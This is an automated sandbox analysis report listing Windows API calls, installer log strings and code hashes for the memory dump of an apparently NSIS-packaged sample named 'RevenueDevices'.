                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringWritelstrcpyn
                                        • String ID: %NodeTransexual%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                        • API String ID: 247603264-375107294
                                        • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                        • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                        • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                        • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                        APIs
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        Strings
                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                        • API String ID: 3156913733-2180253247
                                        • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                        • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                        • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                        • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405E9D
                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: nsa
                                        • API String ID: 1716503409-2209301699
                                        • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                        • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                        • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                        • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                        APIs
                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                        • String ID: HideWindow
                                        • API String ID: 1249568736-780306582
                                        • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                        • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                        • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                        • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                        • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                        • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                        • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                        • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                        • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                        • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                        • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                        • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                        • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                        • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                        • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                        • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                        • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                        • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                        • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                        • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                        • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                        • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                        APIs
                                        • GlobalFree.KERNELBASE(?), ref: 004073C5
                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                        • GlobalFree.KERNELBASE(?), ref: 0040743D
                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree
                                        • String ID:
                                        • API String ID: 3394109436-0
                                        • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                        • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                        • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                        • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: AddressHandleLibraryLoadModuleProc
                                        • String ID:
                                        • API String ID: 310444273-0
                                        • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                        • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                        • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                        • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                        • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                        • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                        • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                        • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                        • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                        • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                        • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                        • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                        • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                        • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                        • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                        • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                        APIs
                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                        • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                        Memory Dump Source
                                        • Source File: 00000058.00000002.3140116988.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000058.00000002.3140089029.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140154893.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140189526.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                        • Associated: 00000058.00000002.3140316265.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_88_2_400000_RevenueDevices.jbxd
                                        Similarity
                                        • API ID: Char$Next$CreateDirectoryPrev
                                        • String ID:
                                        • API String ID: 4115351271-0
                                        • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                        • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                        • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
